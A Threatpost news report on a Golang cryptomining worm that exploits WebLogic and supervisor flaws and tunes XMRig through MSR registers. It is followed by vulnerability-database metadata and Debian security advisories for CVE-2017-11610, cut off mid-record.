Golang Cryptomining Worm Offers 15% Speed Boost

2021-08-06T20:41:40

Description

A freshly discovered variant of the Golang crypto-worm was recently spotted dropping Monero-mining malware on victim machines; in a switch-up of tactics, the payload binaries are capable of speeding up the mining process by 15 percent, researchers said. According to research from Uptycs, the worm scans for and exploits various known vulnerabilities in popular Unix and Linux-based web servers, including [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) in the Oracle WebLogic Server, and [CVE-2017-11610](<https://nvd.nist.gov/vuln/detail/CVE-2017-11610>), a remote code-execution (RCE) bug which affects XML-RPC servers. XML-RPC is an interface provided by WordPress. “CVE-2020-14882 [is a] classic path-traversal vulnerability used for exploiting vulnerable web logic servers,” according to Uptycs. “It seemed like the attacker tried to bypass the authorization mechanism by changing the URL and performing a path traversal using double encoding on /console/images.” [![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>) The exploit for CVE-2017-11610 meanwhile contains an encoded payload in one of the parameters, researchers added. ## **Golang Cryptomining Attack Kill Chain** After initial exploitation, the attack begins with a shell script which downloads the worm using the curl utility, researchers noted, adding that the script uses several defense-evasion techniques like firewall altering and disabling monitoring agents. That initial script then downloads the first-stage worm sample, which was compiled in Golang (hence its name) and UPX-packed, the report noted. The worm uses the go-bindata package to embed off-the-shelf XMRig cryptominer inside itself. Once installed, the worm downloads another shell script which downloads a copy of the same Golang worm. It goes on to write multiple copies of itself to various sensitive directories like /boot,/efi,/grub. After that, it ultimately installs the XMRig into a /tmp location, and uses a base64 encoded command that downloads the shell script on any other remote vulnerable servers from the C2. ## **Monero-Mining with an Efficiency Boost** XMRig is a well-known [cryptominer](<https://threatpost.com/cloud-cryptomining-swindle-google-play/167581/>) for the Monero cryptocurrency, which has been [used as a payload](<https://threatpost.com/worm-golang-malware-windows-payloads/156924/>) by the worm for some time. In this latest campaign however, the binaries have been modified to improve efficiency, according to the [Uptycs report](<https://www.uptycs.com/blog/cryptominer-elfs-using-msr-to-boost-mining-process>), issued Thursday. Specifically, the various malware variants use the Model Specific Register (MSR) driver to disable hardware prefetchers. MSRs in Unix and Linux servers are used for debugging, logging and so on. “Hardware prefetcher is a technique in which the processors prefetch data based on the past access behavior by the core,” Uptycs researchers explained. “The processor (or the CPU), by using hardware prefetcher, stores instructions from the main memory into the L2 cache. However, on multicore processors, the use of aggressive hardware prefetching causes hampering and results in overall degradation of system performance.” That degradation of performance is a problem for XMRig, which harnesses a machine’s processing horsepower to perform the complex calculations at scale required to earn Monero coins. To prevent this, the cryptomining binaries spotted by Uptycs use MSR registers to toggle certain CPU features and computer performance monitoring. By manipulating the MSR registers, hardware prefetchers can be disabled, researchers explained. “According to the documentation of XMRig, disabling the hardware prefetcher increases the speed up to 15 percent,” researchers said. However, this function presents an enhanced risk to businesses, researchers warned: “Alongside the mining process, modification of the MSR registers can lead to fatal performance issues of the corporate resources,” according to the analysis. In all, the Uptycs team identified seven similar samples of the Golang wormed cryptominer, starting in June. “With the rise and sky-high valuation of Bitcoin and several other cryptocurrencies, cryptomining-based attacks [have continued to dominate](<https://threatpost.com/ddos-attacks-q4-cryptomining-resurgence/163998/>) the threat landscape,” researchers concluded. “Wormed cryptominer attacks have a greater threshold as they write multiple copies and also spread across endpoints in a corporate network.” To avoid becoming a victim, keeping systems up-to-date and patched would thwart this particular attack, since it starts with bug exploitations. **Worried about where the next attack is coming from? We’ve got your back. ****[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>) ****for our upcoming live webinar, ****[How to Think Like a Threat Actor](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)****, in partnership with Uptycs. Find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on Aug. 17 at 11AM EST for this ****[LIVE](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**** discussion.**

{"id": "THREATPOST:6F68EF2162540877BC3E8814C07AA52C", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "Golang Cryptomining Worm Offers 15% Speed Boost", "description": "A freshly discovered variant of the Golang crypto-worm was recently spotted dropping Monero-mining malware on victim machines; in a switch-up of tactics, the payload binaries are capable of speeding up the mining process by 15 percent, researchers said.\n\nAccording to research from Uptycs, the worm scans for and exploits various known vulnerabilities in popular Unix and Linux-based web servers, including [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) in the Oracle WebLogic Server, and [CVE-2017-11610](<https://nvd.nist.gov/vuln/detail/CVE-2017-11610>), a remote code-execution (RCE) bug which affects XML-RPC servers. XML-RPC is an interface provided by WordPress.\n\n\u201cCVE-2020-14882 [is a] classic path-traversal vulnerability used for exploiting vulnerable web logic servers,\u201d according to Uptycs. \u201cIt seemed like the attacker tried to bypass the authorization mechanism by changing the URL and performing a path traversal using double encoding on /console/images.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe exploit for CVE-2017-11610 meanwhile contains an encoded payload in one of the parameters, researchers added.\n\n## **Golang Cryptomining Attack Kill Chain**\n\nAfter initial exploitation, the attack begins with a shell script which downloads the worm using the curl utility, researchers noted, adding that the script uses several defense-evasion techniques like firewall altering and disabling monitoring agents.\n\nThat initial script then downloads the first-stage worm sample, which was compiled in Golang (hence its name) and UPX-packed, the report noted. The worm uses the go-bindata package to embed off-the-shelf XMRig cryptominer inside itself.\n\nOnce installed, the worm downloads another shell script which downloads a copy of the same Golang worm. It goes on to write multiple copies of itself to various sensitive directories like /boot,/efi,/grub.\n\nAfter that, it ultimately installs the XMRig into a /tmp location, and uses a base64 encoded command that downloads the shell script on any other remote vulnerable servers from the C2.\n\n## **Monero-Mining with an Efficiency Boost**\n\nXMRig is a well-known [cryptominer](<https://threatpost.com/cloud-cryptomining-swindle-google-play/167581/>) for the Monero cryptocurrency, which has been [used as a payload](<https://threatpost.com/worm-golang-malware-windows-payloads/156924/>) by the worm for some time. In this latest campaign however, the binaries have been modified to improve efficiency, according to the [Uptycs report](<https://www.uptycs.com/blog/cryptominer-elfs-using-msr-to-boost-mining-process>), issued Thursday.\n\nSpecifically, the various malware variants use the Model Specific Register (MSR) driver to disable hardware prefetchers. MSRs in Unix and Linux servers are used for debugging, logging and so on.\n\n\u201cHardware prefetcher is a technique in which the processors prefetch data based on the past access behavior by the core,\u201d Uptycs researchers explained. \u201cThe processor (or the CPU), by using hardware prefetcher, stores instructions from the main memory into the L2 cache. However, on multicore processors, the use of aggressive hardware prefetching causes hampering and results in overall degradation of system performance.\u201d\n\nThat degradation of performance is a problem for XMRig, which harnesses a machine\u2019s processing horsepower to perform the complex calculations at scale required to earn Monero coins.\n\nTo prevent this, the cryptomining binaries spotted by Uptycs use MSR registers to toggle certain CPU features and computer performance monitoring. By manipulating the MSR registers, hardware prefetchers can be disabled, researchers explained.\n\n\u201cAccording to the documentation of XMRig, disabling the hardware prefetcher increases the speed up to 15 percent,\u201d researchers said.\n\nHowever, this function presents an enhanced risk to businesses, researchers warned: \u201cAlongside the mining process, modification of the MSR registers can lead to fatal performance issues of the corporate resources,\u201d according to the analysis.\n\nIn all, the Uptycs team identified seven similar samples of the Golang wormed cryptominer, starting in June.\n\n\u201cWith the rise and sky-high valuation of Bitcoin and several other cryptocurrencies, cryptomining-based attacks [have continued to dominate](<https://threatpost.com/ddos-attacks-q4-cryptomining-resurgence/163998/>) the threat landscape,\u201d researchers concluded. \u201cWormed cryptominer attacks have a greater threshold as they write multiple copies and also spread across endpoints in a corporate network.\u201d\n\nTo avoid becoming a victim, keeping systems up-to-date and patched would thwart this particular attack, since it starts with bug exploitations.\n\n**Worried about where the next attack is coming from? We\u2019ve got your back. ****[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>) ****for our upcoming live webinar, ****[How to Think Like a Threat Actor](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)****, in partnership with Uptycs. Find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on Aug. 17 at 11AM EST for this ****[LIVE](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**** discussion.**\n", "published": "2021-08-06T20:41:40", "modified": "2021-08-06T20:41:40", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://threatpost.com/golang-cryptomining-worm-speed-boost/168456/", "reporter": "Tara Seals", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2020-14882", "https://nvd.nist.gov/vuln/detail/CVE-2017-11610", "https://threatpost.com/newsletter-sign/", "https://threatpost.com/cloud-cryptomining-swindle-google-play/167581/", "https://threatpost.com/worm-golang-malware-windows-payloads/156924/", "https://www.uptycs.com/blog/cryptominer-elfs-using-msr-to-boost-mining-process", "https://threatpost.com/ddos-attacks-q4-cryptomining-resurgence/163998/", "https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar", "https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar", "https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar"], "cvelist": ["CVE-2017-11610", "CVE-2020-14882"], "immutableFields": [], "lastseen": "2021-08-06T21:59:19", "viewCount": 148, "enchantments": {"dependencies": {"references": [{"type": "alpinelinux", "idList": ["ALPINE:CVE-2017-11610"]}, {"type": "attackerkb", "idList": ["AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "AKB:4AD409C9-5AD4-4111-9454-32638C9F8255", "AKB:A4BDBFB9-4493-4EF5-8C05-276721F6549F", "AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1138"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2020-14882"]}, {"type": "cve", "idList": ["CVE-2017-11610", "CVE-2020-14882"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1047-1:0C2E8", "DEBIAN:DLA-1047-1:2DAA4", "DEBIAN:DSA-3942-1:4585A", "DEBIAN:DSA-3942-1:BD4BB"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-11610"]}, {"type": "exploitdb", "idList": ["EDB-ID:42779", "EDB-ID:48971", "EDB-ID:49479"]}, {"type": "fedora", "idList": ["FEDORA:4F26D6017118", "FEDORA:7151D601710E", "FEDORA:7D239601DD9B"]}, {"type": "freebsd", "idList": ["C9460380-81E3-11E7-93AF-005056925DB4"]}, {"type": "gentoo", "idList": ["GLSA-201709-06"]}, {"type": "github", "idList": ["GHSA-X7C8-4X3H-874W"]}, {"type": "githubexploit", "idList": ["01A53B41-499A-535B-8021-CB0329633F46", "07818DFF-3595-58BA-ABC4-AB5DCCE0B8DD", "1B25AC3F-FC8A-51FF-BD1B-29BDB73E331D", "36B6DECF-DB78-5633-9665-AAA8EC3D2A76", "38ACEE5F-E30D-53CD-B59A-2467D332F915", "45775466-2D18-5308-ACCE-40CA731C65D0", "504A0052-A0EB-53EA-AFC3-4E5EEC236795", "60F5B96E-ACB6-5D1D-8375-60BADF9503BC", "65160BD3-C57E-53F7-BB62-1409E74EB491", "693E6A69-453C-50C0-B2B1-91DD65E1D4FF", "79D8EEA6-4961-57CD-99C7-A3404C0B5307", "859F1E96-558A-5D4B-8759-8AA74395E276", "88E567D7-E197-549F-AE13-65809E68DBB3", "8A77E3B6-D786-5618-ACC4-555A5D85D5D5", "900648E6-9E3A-5883-8D16-DC10AD3DCF6F", "9AEDE16C-FF28-5178-A8D1-CB6649E9ED56", "AE4BD3D3-726F-5F95-8DB4-6630F922B00F", "C27DDA07-4A5E-56D3-9950-FD5025E1B777", "C3F26791-EFA4-5899-9702-ACF5F8B70344", "C7D1BCF0-3132-5507-B00B-E1843808D5B0", "CFACBEFA-7243-512E-844E-C19B75303CAA", "DAF7B187-3A0C-543D-BE33-E65468E5890A", "E431282E-5250-58B8-B692-7D184D2EFF7E", "E8075733-690E-5B6E-984C-80D074BC5EFF", "EEEBEAEA-A8C9-5187-A9DA-A04745A62CDF"]}, {"type": "ics", "idList": ["AA22-011A"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:1DB28979DC434D618FB773C7834FB207", "IMPERVABLOG:85E1B351EDAA80DF81632A8B8BD07634"]}, {"type": "kitploit", "idList": ["KITPLOIT:5420210148456420402", "KITPLOIT:914458182851735372"]}, {"type": "mageia", "idList": ["MGASA-2017-0263"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:813434778D13E29E56560316C9FCD816"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-HTTP-SUPERVISOR_XMLRPC_EXEC-", "MSF:EXPLOIT-MULTI-HTTP-WEBLOGIC_ADMIN_HANDLE_RCE-"]}, {"type": "myhack58", "idList": ["MYHACK58:62201993118"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-1047.NASL", "DEBIAN_DSA-3942.NASL", "FEDORA_2017-307EAB89E1.NASL", "FEDORA_2017-713430FB15.NASL", "FEDORA_2017-85EB9F7A36.NASL", "FREEBSD_PKG_C946038081E311E793AF005056925DB4.NASL", "GENTOO_GLSA-201709-06.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2020.NASL", "ORACLE_WEBLOGIC_SERVER_CVE-2020-14882.NBIN", "WEB_APPLICATION_SCANNING_112705"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310703942", "OPENVAS:1361412562310873229", "OPENVAS:1361412562310873232", "OPENVAS:1361412562310873233", "OPENVAS:1361412562310891047"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2020"]}, {"type": "osv", "idList": ["OSV:DLA-1047-1", "OSV:DSA-3942-1", "OSV:GHSA-X7C8-4X3H-874W", "OSV:PYSEC-2017-41"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144316", "PACKETSTORM:159769", "PACKETSTORM:160143", "PACKETSTORM:161128"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:0EAB7251347951045CAC549194E33673"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:8E02D06635B184C252A0274FC4A163A6"]}, {"type": "redhat", "idList": ["RHSA-2017:3005"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-11610"]}, {"type": "seebug", "idList": ["SSV:96316"]}, {"type": "thn", "idList": ["THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:8ECDF261632B04DEE688C1023DD73404", "THN:B36CB9AC96CE2C515157963E75E4AC6A", "THN:FF1CD6F91A87ADD45550F34DE9C8204A"]}, {"type": "threatpost", "idList": ["THREATPOST:4844442F117316BC8EEC54269FACDAA8", "THREATPOST:626313834C3B7D13BDDD703C425DACA5", "THREATPOST:B574047DB8D0D69958A618406B0BDAC4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:608F794950B54766A75ABA93823701D0", "TRENDMICROBLOG:64CE304907BCE85ADF8422301BEFF093", "TRENDMICROBLOG:C00F7F935E0D1EAD0509B4C376B20A1F"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-11610"]}, {"type": "zdt", "idList": ["1337DAY-ID-28624", "1337DAY-ID-35287"]}]}, "score": {"value": 0.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "alpinelinux", "idList": ["ALPINE:CVE-2017-11610"]}, {"type": "attackerkb", "idList": ["AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "AKB:A4BDBFB9-4493-4EF5-8C05-276721F6549F", "AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1138"]}, {"type": "cve", "idList": ["CVE-2017-11610"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1047-1:2DAA4", "DEBIAN:DSA-3942-1:4585A"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-11610"]}, {"type": "exploitdb", "idList": ["EDB-ID:42779", "EDB-ID:48971"]}, {"type": "fedora", "idList": ["FEDORA:4F26D6017118", "FEDORA:7151D601710E", "FEDORA:7D239601DD9B"]}, {"type": "freebsd", "idList": ["C9460380-81E3-11E7-93AF-005056925DB4"]}, {"type": "gentoo", "idList": ["GLSA-201709-06"]}, {"type": "githubexploit", "idList": ["01A53B41-499A-535B-8021-CB0329633F46", "07818DFF-3595-58BA-ABC4-AB5DCCE0B8DD", "1B25AC3F-FC8A-51FF-BD1B-29BDB73E331D", "2ED15233-2A01-53F8-A939-8A4D06481CF4", "36B6DECF-DB78-5633-9665-AAA8EC3D2A76", "38ACEE5F-E30D-53CD-B59A-2467D332F915", "45775466-2D18-5308-ACCE-40CA731C65D0", "504A0052-A0EB-53EA-AFC3-4E5EEC236795", "60F5B96E-ACB6-5D1D-8375-60BADF9503BC", "65160BD3-C57E-53F7-BB62-1409E74EB491", "693E6A69-453C-50C0-B2B1-91DD65E1D4FF", "79D8EEA6-4961-57CD-99C7-A3404C0B5307", "859F1E96-558A-5D4B-8759-8AA74395E276", "88E567D7-E197-549F-AE13-65809E68DBB3", "8A77E3B6-D786-5618-ACC4-555A5D85D5D5", "900648E6-9E3A-5883-8D16-DC10AD3DCF6F", "9AEDE16C-FF28-5178-A8D1-CB6649E9ED56", "AE4BD3D3-726F-5F95-8DB4-6630F922B00F", "B41082A1-4177-53E2-A74C-8ABA13AA3E86", "C27DDA07-4A5E-56D3-9950-FD5025E1B777", "C3F26791-EFA4-5899-9702-ACF5F8B70344", "C7D1BCF0-3132-5507-B00B-E1843808D5B0", "CFACBEFA-7243-512E-844E-C19B75303CAA", "DAF7B187-3A0C-543D-BE33-E65468E5890A", "E431282E-5250-58B8-B692-7D184D2EFF7E", "E8075733-690E-5B6E-984C-80D074BC5EFF", "EEEBEAEA-A8C9-5187-A9DA-A04745A62CDF"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:1DB28979DC434D618FB773C7834FB207"]}, {"type": "kitploit", "idList": ["KITPLOIT:5420210148456420402"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:813434778D13E29E56560316C9FCD816"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/SUPERVISOR_XMLRPC_EXEC"]}, {"type": "myhack58", "idList": ["MYHACK58:62201993118"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-1047.NASL", "DEBIAN_DSA-3942.NASL", "FEDORA_2017-307EAB89E1.NASL", "FEDORA_2017-713430FB15.NASL", "FEDORA_2017-85EB9F7A36.NASL", "FREEBSD_PKG_C946038081E311E793AF005056925DB4.NASL", "GENTOO_GLSA-201709-06.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310703942", "OPENVAS:1361412562310873229", "OPENVAS:1361412562310873232", "OPENVAS:1361412562310873233"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144316", "PACKETSTORM:159769", "PACKETSTORM:160143"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:8E02D06635B184C252A0274FC4A163A6"]}, {"type": "redhat", "idList": ["RHSA-2017:3005"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-11610"]}, {"type": "seebug", "idList": ["SSV:96316"]}, {"type": "thn", "idList": ["THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:8ECDF261632B04DEE688C1023DD73404"]}, {"type": "threatpost", "idList": ["THREATPOST:050A36E6453D4472A2734DA342E95366", "THREATPOST:4844442F117316BC8EEC54269FACDAA8", "THREATPOST:626313834C3B7D13BDDD703C425DACA5", "THREATPOST:B574047DB8D0D69958A618406B0BDAC4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:C00F7F935E0D1EAD0509B4C376B20A1F"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-11610"]}, {"type": "zdt", "idList": ["1337DAY-ID-28624"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2017-11610", "epss": "0.974580000", "percentile": "0.999100000", "modified": "2023-03-17"}, {"cve": "CVE-2020-14882", "epss": "0.975590000", "percentile": "0.999930000", "modified": "2023-03-17"}], "vulnersScore": 0.5}, "_state": {"dependencies": 1678920471, "score": 1684008354, "epss": 1679107841}, "_internal": {"score_hash": "18e908949040641ff187af7387ce5483"}}

{"debian": [{"lastseen": "2021-10-21T21:57:08", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3942-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nAugust 13, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : supervisor\nCVE ID : CVE-2017-11610\nDebian Bug : 870187\n\nCalum Hutton reported that the XML-RPC server in supervisor, a system\nfor controlling process state, does not perform validation on requested\nXML-RPC methods, allowing an authenticated client to send a malicious\nXML-RPC request to supervisord that will run arbitrary shell commands on\nthe server as the same user as supervisord.\n\nThe vulnerability has been fixed by disabling nested namespace lookup\nentirely. supervisord will now only call methods on the object\nregistered to handle XML-RPC requests and not any child objects it may\ncontain, possibly breaking existing setups. No publicly available\nplugins are currently known that use nested namespaces. Plugins that use\na single namespace will continue to work as before. Details can be found\non the upstream issue at\nhttps://github.com/Supervisor/supervisor/issues/964 .\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 3.0r1-1+deb8u1.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 3.3.1-1+deb9u1.\n\nWe recommend that you upgrade your supervisor packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-13T19:45:15", "type": "debian", "title": "[SECURITY] [DSA 3942-1] supervisor security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2017-08-13T19:45:15", "id": "DEBIAN:DSA-3942-1:BD4BB", "href": "https://lists.debian.org/debian-security-announce/2017/msg00203.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-07T15:47:42", "description": "Package : supervisor\nVersion : 3.0a8-1.1+deb7u2\nCVE ID : CVE-2017-11610\nDebian Bug : 870187\n\nA vulnerability has been found in supervisor, a system for controlling\nprocess state, where an authenticated client can send a malicious\nXML-RPC request to supervisord that will run arbitrary shell commands\non the server. The commands will be run as the same user as supervisord.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n3.0a8-1.1+deb7u2.\n\nWe recommend that you upgrade your supervisor packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-31T12:59:48", "type": "debian", "title": "[SECURITY] [DLA 1047-1] supervisor security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2017-07-31T12:59:48", "id": "DEBIAN:DLA-1047-1:2DAA4", "href": "https://lists.debian.org/debian-lts-announce/2017/07/msg00042.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-10-23T21:27:44", "description": "Package : supervisor\nVersion : 3.0a8-1.1+deb7u2\nCVE ID : CVE-2017-11610\nDebian Bug : 870187\n\nA vulnerability has been found in supervisor, a system for controlling\nprocess state, where an authenticated client can send a malicious\nXML-RPC request to supervisord that will run arbitrary shell commands\non the server. The commands will be run as the same user as supervisord.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n3.0a8-1.1+deb7u2.\n\nWe recommend that you upgrade your supervisor packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-31T12:59:48", "type": "debian", "title": "[SECURITY] [DLA 1047-1] supervisor security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2017-07-31T12:59:48", "id": "DEBIAN:DLA-1047-1:0C2E8", "href": "https://lists.debian.org/debian-lts-announce/2017/07/msg00042.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-02T16:00:40", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3942-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nAugust 13, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : supervisor\nCVE ID : CVE-2017-11610\nDebian Bug : 870187\n\nCalum Hutton reported that the XML-RPC server in supervisor, a system\nfor controlling process state, does not perform validation on requested\nXML-RPC methods, allowing an authenticated client to send a malicious\nXML-RPC request to supervisord that will run arbitrary shell commands on\nthe server as the same user as supervisord.\n\nThe vulnerability has been fixed by disabling nested namespace lookup\nentirely. supervisord will now only call methods on the object\nregistered to handle XML-RPC requests and not any child objects it may\ncontain, possibly breaking existing setups. No publicly available\nplugins are currently known that use nested 